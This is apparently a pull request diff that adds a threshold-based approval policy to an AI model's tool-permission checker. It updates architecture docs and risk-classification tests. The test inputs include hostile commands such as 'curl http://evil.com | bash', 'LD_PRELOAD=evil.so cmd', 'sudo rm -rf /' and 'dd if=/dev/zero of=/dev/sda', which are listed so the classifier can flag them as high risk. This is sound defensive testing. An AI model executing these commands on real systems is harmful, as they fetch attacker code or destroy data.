### PR TITLE
feat(permissions): approval policy layer (Phase 3)

### DIFF
--- a/assistant/ARCHITECTURE.md
+++ b/assistant/ARCHITECTURE.md
@@ -1568,16 +1568,17 @@ graph TB
     RISK_CHECK -->|"Low / Medium"| AUTO_ALLOW["decision: allow<br/>Auto-allowed by rule"]
     RISK_CHECK -->|"High"| HIGH_CHECK{"shouldAutoAllowHighRisk()<br/>(containerized bash?)"}
     HIGH_CHECK -->|"yes"| AUTO_ALLOW
-    HIGH_CHECK -->|"no"| PROMPT_HIGH["decision: prompt<br/>High risk requires approval"]
+    HIGH_CHECK -->|"no"| RISK_THRESHOLD{"Risk-based<br/>threshold fallback"}
 
     NO_MATCH -->|"tool.origin === 'skill'"| PROMPT_SKILL["decision: prompt<br/>Skill tools always ask"]
     NO_MATCH -->|"strict mode"| PROMPT_STRICT["decision: prompt<br/>No implicit auto-allow"]
-    NO_MATCH -->|"workspace mode (default)"| WS_CHECK{"Workspace-scoped<br/>invocation?"}
+    NO_MATCH -->|"workspace mode (default)"| WS_CHECK{"Workspace-scoped<br/>+ Low risk?"}
     WS_CHECK -->|"yes"| AUTO_WS["decision: allow<br/>Workspace-scoped auto-allow"]
-    WS_CHECK -->|"no"| RISK_FALLBACK_WS{"Risk level?"}
-    RISK_FALLBACK_WS -->|"Low"| AUTO_WS_LOW["decision: allow<br/>Low risk auto-allow"]
-    RISK_FALLBACK_WS -->|"Medium"| PROMPT_WS_MED["decision: prompt"]
-    RISK_FALLBACK_WS -->|"High"| PROMPT_WS_HIGH["decision: prompt"]
+    WS_CHECK -->|"no"| RISK_THRESHOLD
+
+    RISK_THRESHOLD{"risk ≤ autoApproveUpTo<br/>threshold?"}
+    RISK_THRESHOLD -->|"yes"| AUTO_THRESHOLD["decision: allow<br/>within auto-approve threshold"]
+    RISK_THRESHOLD -->|"no"| PROMPT_THRESHOLD["decision: prompt<br/>above auto-approve threshold"]
 ```
 
 ### Permission Modes: Workspace and Strict
@@ -1710,7 +1711,7 @@ When a permission prompt is sent to the client (via `confirmation_request` SSE e
 | `allowlistOptions` | Suggested patterns for "always allow" rules         |
 | `scopeOptions`     | Suggested scopes for rule persistence               |
 
-The user can respond with: `allow` (one-time), `always_allow` (create allow rule), `deny` (one-time), or `always_deny` (create deny rule). High-risk operations in containerized environments are auto-allowed at runtime by `shouldAutoAllowHighRisk()` without requiring persisted state.
+The user can respond with: `allow` (one-time), `always_allow` (create allow rule), `deny` (one-time), or `always_deny` (create deny rule). High-risk operations with an allow rule in containerized environments are auto-allowed at runtime by `DefaultApprovalPolicy.shouldAutoAllowHighRisk()` without requiring persisted state. All other risk-based decisions use the `autoApproveUpTo` threshold (default: `"low"`) -- tools at or below the threshold are auto-allowed, those above are prompted.
 
 ### Canonical Paths
 

--- a/assistant/docs/architecture/security.md
+++ b/assistant/docs/architecture/security.md
@@ -22,16 +22,17 @@ graph TB
     RISK_CHECK -->|"Low / Medium"| AUTO_ALLOW["decision: allow<br/>Auto-allowed by rule"]
     RISK_CHECK -->|"High"| HIGH_CHECK{"shouldAutoAllowHighRisk()<br/>(containerized bash?)"}
     HIGH_CHECK -->|"yes"| AUTO_ALLOW
-    HIGH_CHECK -->|"no"| PROMPT_HIGH["decision: prompt<br/>High risk requires approval"]
+    HIGH_CHECK -->|"no"| RISK_THRESHOLD{"Risk-based<br/>threshold fallback"}
 
     NO_MATCH -->|"tool.origin === 'skill'"| PROMPT_SKILL["decision: prompt<br/>Skill tools always ask"]
     NO_MATCH -->|"strict mode"| PROMPT_STRICT["decision: prompt<br/>No implicit auto-allow"]
-    NO_MATCH -->|"workspace mode (default)"| WS_CHECK{"Workspace-scoped<br/>invocation?"}
+    NO_MATCH -->|"workspace mode (default)"| WS_CHECK{"Workspace-scoped<br/>+ Low risk?"}
     WS_CHECK -->|"yes"| AUTO_WS["decision: allow<br/>Workspace-scoped auto-allow"]
-    WS_CHECK -->|"no"| RISK_FALLBACK_WS{"Risk level?"}
-    RISK_FALLBACK_WS -->|"Low"| AUTO_WS_LOW["decision: allow<br/>Low risk auto-allow"]
-    RISK_FALLBACK_WS -->|"Medium"| PROMPT_WS_MED["decision: prompt"]
-    RISK_FALLBACK_WS -->|"High"| PROMPT_WS_HIGH["decision: prompt"]
+    WS_CHECK -->|"no"| RISK_THRESHOLD
+
+    RISK_THRESHOLD{"risk ≤ autoApproveUpTo<br/>threshold?"}
+    RISK_THRESHOLD -->|"yes"| AUTO_THRESHOLD["decision: allow<br/>within auto-approve threshold"]
+    RISK_THRESHOLD -->|"no"| PROMPT_THRESHOLD["decision: prompt<br/>above auto-approve threshold"]
 ```
 
 ### Permission Modes: Workspace and Strict
@@ -164,7 +165,7 @@ When a permission prompt is sent to the client (via `confirmation_request` SSE e
 | `allowlistOptions` | Suggested patterns for "always allow" rules         |
 | `scopeOptions`     | Suggested scopes for rule persistence               |
 
-The user can respond with: `allow` (one-time), `always_allow` (create allow rule), `deny` (one-time), or `always_deny` (create deny rule). High-risk operations in containerized environments are auto-allowed at runtime by `shouldAutoAllowHighRisk()` without requiring persisted state.
+The user can respond with: `allow` (one-time), `always_allow` (create allow rule), `deny` (one-time), or `always_deny` (create deny rule). High-risk operations with an allow rule in containerized environments are auto-allowed at runtime by `DefaultApprovalPolicy.shouldAutoAllowHighRisk()` without requiring persisted state. All other risk-based decisions use the `autoApproveUpTo` threshold (default: `"low"`) -- tools at or below the threshold are auto-allowed, those above are prompted.
 
 ### Canonical Paths
 

--- a/assistant/src/__tests__/checker.test.ts
+++ b/assistant/src/__tests__/checker.test.ts
@@ -713,7 +713,7 @@ describe("Permission Checker", () => {
       // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.reason).toContain("Low risk");
+      expect(low.reason).toContain("low risk");
     });
 
     test("host_bash high risk → always prompt", async () => {
@@ -760,7 +760,7 @@ describe("Permission Checker", () => {
       addRule("bash", "rm *", "/tmp");
       const result = await check("bash", { command: "rm file.txt" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
 
     test("file_read → auto-allow", async () => {
@@ -942,7 +942,7 @@ describe("Permission Checker", () => {
       );
       // High-risk tools always prompt even with allow rules
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
 
     test("allow rule for scaffold_managed_skill does not match other skill ids", async () => {
@@ -976,7 +976,7 @@ describe("Permission Checker", () => {
       );
       // High-risk tools always prompt even with allow rules
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
 
     test("computer_use_click prompts by default via computer-use ask rule", async () => {
@@ -1087,7 +1087,7 @@ describe("Permission Checker", () => {
       addRule("bash", "sudo *", "everywhere");
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
 
     // Deny rule tests
@@ -1463,7 +1463,7 @@ describe("Permission Checker", () => {
       // Use a path outside the workspace to test the risk-based fallback.
       const result = await check("file_read", { path: "/etc/hosts" }, "/tmp");
       expect(result.decision).toBe("allow");
-      expect(result.reason).toContain("Low risk");
+      expect(result.reason).toContain("low risk");
     });
 
     // Regression: trust rules properly override the default-ask policy
@@ -1522,7 +1522,7 @@ describe("Permission Checker", () => {
       // reason discriminator to verify it's the high-risk fallback path, not
       // the generic skill-tool default-ask policy.
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
   });
 
@@ -2646,7 +2646,7 @@ describe("Permission Checker", () => {
       addRule("bash", "sudo *", "everywhere", "allow");
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
   });
 
@@ -2657,7 +2657,7 @@ describe("Permission Checker", () => {
       addRule("bash", "kill *", "everywhere", "allow", 2000);
       const result = await check("bash", { command: "kill -9 1234" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
 
     test("high-risk bash with allow rule in containerized environment auto-allows", async () => {
@@ -2780,7 +2780,7 @@ describe("Permission Checker", () => {
       addRule("bash", "kill *", "everywhere", "allow", 2000);
       const result = await check("bash", { command: "kill -9 1234" }, "/tmp");
       expect(result.decision).toBe("prompt");
-      expect(result.reason).toContain("High risk");
+      expect(result.reason).toContain("high risk");
     });
 
     test("strict mode: medium-risk with matching allow rule auto-allows", async () => {
@@ -4046,7 +4046,7 @@ describe("Permission Checker", () => {
         addRule("file_write", `file_write:${checkerTestDir}/skills/**`, "/tmp");
         const result = await check("file_write", { path: skillPath }, "/tmp");
         expect(result.decision).toBe("prompt");
-        expect(result.reason).toContain("High risk");
+        expect(result.reason).toContain("high risk");
       });
 
       test("allow rule for skill mutation prompts (high risk, non-bash tool)", async () => {
@@ -4775,7 +4775,7 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
       workspaceDir,
     );
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("file_write outside workspace → allow (Low risk fallback)", async () => {
@@ -4785,7 +4785,7 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
       workspaceDir,
     );
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
@@ -4795,7 +4795,7 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.decision).toBe("allow");
     // Not auto-allowed via workspace mode — bash falls through to risk-based policy
     expect(result.reason).not.toContain("Workspace mode");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {
@@ -4883,7 +4883,7 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
       workspaceDir,
     );
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("network_request → prompt (Medium risk, not workspace-scoped)", async () => {

--- a/assistant/src/__tests__/checker.test.ts
+++ b/assistant/src/__tests__/checker.test.ts
@@ -205,12 +205,12 @@ describe("Permission Checker", () => {
     describe("file_read", () => {
       test("file_read is low risk for regular files", async () => {
         const risk = await classifyRisk("file_read", { path: "/etc/passwd" });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
 
       test("file_read with arbitrary non-key path is low risk", async () => {
         const risk = await classifyRisk("file_read", { path: "/tmp/safe.txt" });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
 
       test("file_read of workspace signing key path is high risk", async () => {
@@ -220,7 +220,7 @@ describe("Permission Checker", () => {
           { path: "deprecated/actor-token-signing-key" },
           workspaceDir,
         );
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
 
       test("file_read of legacy protected signing key path is high risk", async () => {
@@ -232,7 +232,7 @@ describe("Permission Checker", () => {
             "actor-token-signing-key",
           ),
         });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
 
       test("file_read of legacy signing key is high risk even when BASE_DATA_DIR relocates getProtectedDir()", async () => {
@@ -247,7 +247,7 @@ describe("Permission Checker", () => {
               "actor-token-signing-key",
             ),
           });
-          expect(risk).toBe(RiskLevel.High);
+          expect(risk.level).toBe(RiskLevel.High);
         } finally {
           if (savedBaseDataDir === undefined) delete process.env.BASE_DATA_DIR;
           else process.env.BASE_DATA_DIR = savedBaseDataDir;
@@ -261,12 +261,12 @@ describe("Permission Checker", () => {
         const risk = await classifyRisk("file_write", {
           path: "/tmp/file.txt",
         });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
 
       test("file_write with any path is low risk", async () => {
         const risk = await classifyRisk("file_write", { path: "/etc/passwd" });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
     });
 
@@ -275,7 +275,7 @@ describe("Permission Checker", () => {
         const risk = await classifyRisk("skill_load", {
           skill: "release-checklist",
         });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
     });
 
@@ -284,7 +284,7 @@ describe("Permission Checker", () => {
         const risk = await classifyRisk("web_fetch", {
           url: "https://example.com",
         });
-        expect(risk).toBe(RiskLevel.Low);
+        expect(risk.level).toBe(RiskLevel.Low);
       });
 
       test("web_fetch with allow_private_network is high risk", async () => {
@@ -292,7 +292,7 @@ describe("Permission Checker", () => {
           url: "http://localhost:3000",
           allow_private_network: true,
         });
-        expect(risk).toBe(RiskLevel.High);
+        expect(risk.level).toBe(RiskLevel.High);
       });
     });
 
@@ -301,121 +301,129 @@ describe("Permission Checker", () => {
         const risk = await classifyRisk("network_request", {
           url: "https://api.example.com/v1/data",
         });
-        expect(risk).toBe(RiskLevel.Medium);
+        expect(risk.level).toBe(RiskLevel.Medium);
       });
 
       test("network_request is medium risk even without url", async () => {
         const risk = await classifyRisk("network_request", {});
-        expect(risk).toBe(RiskLevel.Medium);
+        expect(risk.level).toBe(RiskLevel.Medium);
       });
     });
 
     // shell commands - low risk
     describe("shell — low risk", () => {
       test("ls is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "ls" })).toBe(
+        expect((await classifyRisk("bash", { command: "ls" })).level).toBe(
           RiskLevel.Low,
         );
       });
 
       test("cat is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "cat file.txt" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "cat file.txt" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("grep is low risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "grep pattern file" }),
+          (await classifyRisk("bash", { command: "grep pattern file" })).level,
         ).toBe(RiskLevel.Low);
       });
 
       test("git status is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "git status" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "git status" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("git log is low risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "git log --oneline" }),
+          (await classifyRisk("bash", { command: "git log --oneline" })).level,
         ).toBe(RiskLevel.Low);
       });
 
       test("git diff is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "git diff" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "git diff" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("git --no-pager log is low risk (boolean global flag before subcommand)", async () => {
         expect(
-          await classifyRisk("bash", { command: "git --no-pager log" }),
+          (await classifyRisk("bash", { command: "git --no-pager log" })).level,
         ).toBe(RiskLevel.Low);
       });
 
       test("git -C /some/path status is low risk (value-taking flag before subcommand)", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "git -C /some/path status",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "git -C /some/path status",
+            })
+          ).level,
         ).toBe(RiskLevel.Low);
       });
 
       test("git -c core.editor=vim diff is low risk (value-taking -c flag before subcommand)", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "git -c core.editor=vim diff",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "git -c core.editor=vim diff",
+            })
+          ).level,
         ).toBe(RiskLevel.Low);
       });
 
       test("echo is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "echo hello" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "echo hello" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("pwd is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "pwd" })).toBe(
+        expect((await classifyRisk("bash", { command: "pwd" })).level).toBe(
           RiskLevel.Low,
         );
       });
 
       test("node is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "node --version" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "node --version" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("bun --version is medium risk (bun base risk)", async () => {
         // bun is medium base risk in the registry since it can execute code
-        expect(await classifyRisk("bash", { command: "bun --version" })).toBe(
-          RiskLevel.Medium,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "bun --version" })).level,
+        ).toBe(RiskLevel.Medium);
       });
 
       test("bun test is high risk (executes arbitrary scripts)", async () => {
-        expect(await classifyRisk("bash", { command: "bun test" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "bun test" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("empty command is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "" })).toBe(RiskLevel.Low);
+        expect((await classifyRisk("bash", { command: "" })).level).toBe(
+          RiskLevel.Low,
+        );
       });
 
       test("whitespace command is low risk", async () => {
-        expect(await classifyRisk("bash", { command: "   " })).toBe(
+        expect((await classifyRisk("bash", { command: "   " })).level).toBe(
           RiskLevel.Low,
         );
       });
 
       test("safe pipe is low risk", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "cat file | grep pattern | wc -l",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "cat file | grep pattern | wc -l",
+            })
+          ).level,
         ).toBe(RiskLevel.Low);
       });
     });
@@ -424,87 +432,99 @@ describe("Permission Checker", () => {
     describe("shell — medium risk", () => {
       test("unknown program is medium risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "some_custom_tool" }),
+          (await classifyRisk("bash", { command: "some_custom_tool" })).level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("rm (without -r) is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "rm file.txt" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "rm file.txt" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("chmod is high risk (permission changes)", async () => {
         expect(
-          await classifyRisk("bash", { command: "chmod 644 file.txt" }),
+          (await classifyRisk("bash", { command: "chmod 644 file.txt" })).level,
         ).toBe(RiskLevel.High);
       });
 
       test("chown is high risk (ownership changes)", async () => {
         expect(
-          await classifyRisk("bash", { command: "chown user file.txt" }),
+          (await classifyRisk("bash", { command: "chown user file.txt" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("chgrp is high risk (group changes)", async () => {
         expect(
-          await classifyRisk("bash", { command: "chgrp group file.txt" }),
+          (await classifyRisk("bash", { command: "chgrp group file.txt" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("git push (non-read-only) is medium risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "git push origin main" }),
+          (await classifyRisk("bash", { command: "git push origin main" }))
+            .level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("git commit is medium risk", async () => {
         expect(
-          await classifyRisk("bash", { command: 'git commit -m "msg"' }),
+          (await classifyRisk("bash", { command: 'git commit -m "msg"' }))
+            .level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("git -C status commit is medium risk (value-taking flag with dir named like a subcommand)", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "git -C status commit",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "git -C status commit",
+            })
+          ).level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("git -C /path push is medium risk (value-taking flag before mutating subcommand)", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "git -C /path push",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "git -C /path push",
+            })
+          ).level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("git --git-dir /path/to/.git push is medium risk", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "git --git-dir /path/to/.git push",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "git --git-dir /path/to/.git push",
+            })
+          ).level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("git --no-pager push is medium risk (boolean flag before mutating subcommand)", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "git --no-pager push",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "git --no-pager push",
+            })
+          ).level,
         ).toBe(RiskLevel.Medium);
       });
 
       test("opaque construct (eval) is high risk (registry: executes arbitrary code)", async () => {
-        expect(await classifyRisk("bash", { command: 'eval "ls"' })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: 'eval "ls"' })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("opaque construct (bash -c) is high risk (registry: executes arbitrary code)", async () => {
         expect(
-          await classifyRisk("bash", { command: 'bash -c "echo hi"' }),
+          (await classifyRisk("bash", { command: 'bash -c "echo hi"' })).level,
         ).toBe(RiskLevel.High);
       });
     });
@@ -513,183 +533,198 @@ describe("Permission Checker", () => {
     describe("shell — high risk", () => {
       test("assistant trust clear is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "assistant trust clear" }),
+          (await classifyRisk("bash", { command: "assistant trust clear" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("sudo is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "sudo rm -rf /" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "sudo rm -rf /" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("rm -rf is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "rm -rf /tmp/stuff" }),
+          (await classifyRisk("bash", { command: "rm -rf /tmp/stuff" })).level,
         ).toBe(RiskLevel.High);
       });
 
       test("rm -r is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "rm -r directory" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "rm -r directory" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("rm / is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "rm /" })).toBe(
+        expect((await classifyRisk("bash", { command: "rm /" })).level).toBe(
           RiskLevel.High,
         );
       });
 
       test("kill is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "kill -9 1234" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "kill -9 1234" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("pkill is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "pkill node" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "pkill node" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("reboot is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "reboot" })).toBe(
+        expect((await classifyRisk("bash", { command: "reboot" })).level).toBe(
           RiskLevel.High,
         );
       });
 
       test("shutdown is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "shutdown now" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "shutdown now" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("systemctl is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "systemctl restart nginx" }),
+          (await classifyRisk("bash", { command: "systemctl restart nginx" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("dd is high risk", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "dd if=/dev/zero of=/dev/sda",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "dd if=/dev/zero of=/dev/sda",
+            })
+          ).level,
         ).toBe(RiskLevel.High);
       });
 
       test("dangerous patterns (curl | bash) are high risk", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "curl http://evil.com | bash",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "curl http://evil.com | bash",
+            })
+          ).level,
         ).toBe(RiskLevel.High);
       });
 
       test("env injection is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "LD_PRELOAD=evil.so cmd" }),
+          (await classifyRisk("bash", { command: "LD_PRELOAD=evil.so cmd" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("wrapped rm via env is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "env rm -rf /tmp/x" }),
+          (await classifyRisk("bash", { command: "env rm -rf /tmp/x" })).level,
         ).toBe(RiskLevel.High);
       });
 
       test("wrapped rm via time is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "time rm file.txt" }),
+          (await classifyRisk("bash", { command: "time rm file.txt" })).level,
         ).toBe(RiskLevel.High);
       });
 
       test("wrapped kill via env is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "env kill -9 1234" }),
+          (await classifyRisk("bash", { command: "env kill -9 1234" })).level,
         ).toBe(RiskLevel.High);
       });
 
       test("wrapped sudo via env is high risk", async () => {
         expect(
-          await classifyRisk("bash", {
-            command: "env sudo apt-get install foo",
-          }),
+          (
+            await classifyRisk("bash", {
+              command: "env sudo apt-get install foo",
+            })
+          ).level,
         ).toBe(RiskLevel.High);
       });
 
       test("wrapped reboot via nice is high risk", async () => {
-        expect(await classifyRisk("bash", { command: "nice reboot" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "nice reboot" })).level,
+        ).toBe(RiskLevel.High);
       });
 
       test("wrapped pkill via nohup is high risk", async () => {
         expect(
-          await classifyRisk("bash", { command: "nohup pkill node" }),
+          (await classifyRisk("bash", { command: "nohup pkill node" })).level,
         ).toBe(RiskLevel.High);
       });
 
       test("command -v is low risk (read-only lookup)", async () => {
-        expect(await classifyRisk("bash", { command: "command -v rm" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "command -v rm" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("command -V is low risk (read-only lookup)", async () => {
-        expect(await classifyRisk("bash", { command: "command -V sudo" })).toBe(
-          RiskLevel.Low,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "command -V sudo" })).level,
+        ).toBe(RiskLevel.Low);
       });
 
       test("command without -v/-V flag escalates wrapped program", async () => {
         expect(
-          await classifyRisk("bash", { command: "command rm file.txt" }),
+          (await classifyRisk("bash", { command: "command rm file.txt" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("rm BOOTSTRAP.md (bare safe file) is medium risk", async () => {
-        expect(await classifyRisk("bash", { command: "rm BOOTSTRAP.md" })).toBe(
-          RiskLevel.Medium,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "rm BOOTSTRAP.md" })).level,
+        ).toBe(RiskLevel.Medium);
       });
 
       test("rm UPDATES.md (bare safe file) is medium risk", async () => {
-        expect(await classifyRisk("bash", { command: "rm UPDATES.md" })).toBe(
-          RiskLevel.Medium,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "rm UPDATES.md" })).level,
+        ).toBe(RiskLevel.Medium);
       });
 
       test("rm -rf BOOTSTRAP.md is still high risk (flags present)", async () => {
         expect(
-          await classifyRisk("bash", { command: "rm -rf BOOTSTRAP.md" }),
+          (await classifyRisk("bash", { command: "rm -rf BOOTSTRAP.md" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("rm /path/to/BOOTSTRAP.md is still high risk (path separator)", async () => {
         expect(
-          await classifyRisk("bash", { command: "rm /path/to/BOOTSTRAP.md" }),
+          (await classifyRisk("bash", { command: "rm /path/to/BOOTSTRAP.md" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("rm BOOTSTRAP.md other.txt is still high risk (multiple targets)", async () => {
         expect(
-          await classifyRisk("bash", { command: "rm BOOTSTRAP.md other.txt" }),
+          (await classifyRisk("bash", { command: "rm BOOTSTRAP.md other.txt" }))
+            .level,
         ).toBe(RiskLevel.High);
       });
 
       test("rm somefile.md is still high risk (not a known safe file)", async () => {
-        expect(await classifyRisk("bash", { command: "rm somefile.md" })).toBe(
-          RiskLevel.High,
-        );
+        expect(
+          (await classifyRisk("bash", { command: "rm somefile.md" })).level,
+        ).toBe(RiskLevel.High);
       });
     });
 
     // unknown tool
     describe("unknown tool", () => {
       test("unknown tool name is medium risk", async () => {
-        expect(await classifyRisk("unknown_tool", {})).toBe(RiskLevel.Medium);
+        expect((await classifyRisk("unknown_tool", {})).level).toBe(
+          RiskLevel.Medium,
+        );
       });
     });
   });
@@ -2186,14 +2221,14 @@ describe("Permission Checker", () => {
         "executor.ts",
       );
       const risk = await classifyRisk("file_write", { path: skillPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("file_edit of skill file is High risk", async () => {
       ensureSkillsDir();
       const skillPath = join(checkerTestDir, "skills", "my-skill", "SKILL.md");
       const risk = await classifyRisk("file_edit", { path: skillPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("file_read of skill file is still Low risk (reads not escalated)", async () => {
@@ -2205,7 +2240,7 @@ describe("Permission Checker", () => {
         "TOOLS.json",
       );
       const risk = await classifyRisk("file_read", { path: skillPath });
-      expect(risk).toBe(RiskLevel.Low);
+      expect(risk.level).toBe(RiskLevel.Low);
     });
 
     test("file_write to skill directory prompts via default ask rule", async () => {
@@ -2278,7 +2313,7 @@ describe("Permission Checker", () => {
       ensureSkillsDir();
       const skillPath = join(checkerTestDir, "skills", "my-skill", "SKILL.md");
       const risk = await classifyRisk("host_file_edit", { path: skillPath });
-      expect(risk).toBe(RiskLevel.High);
+      expect(risk.level).toBe(RiskLevel.High);
     });
 
     test("host_file_write to skill directory is High risk", async () => {
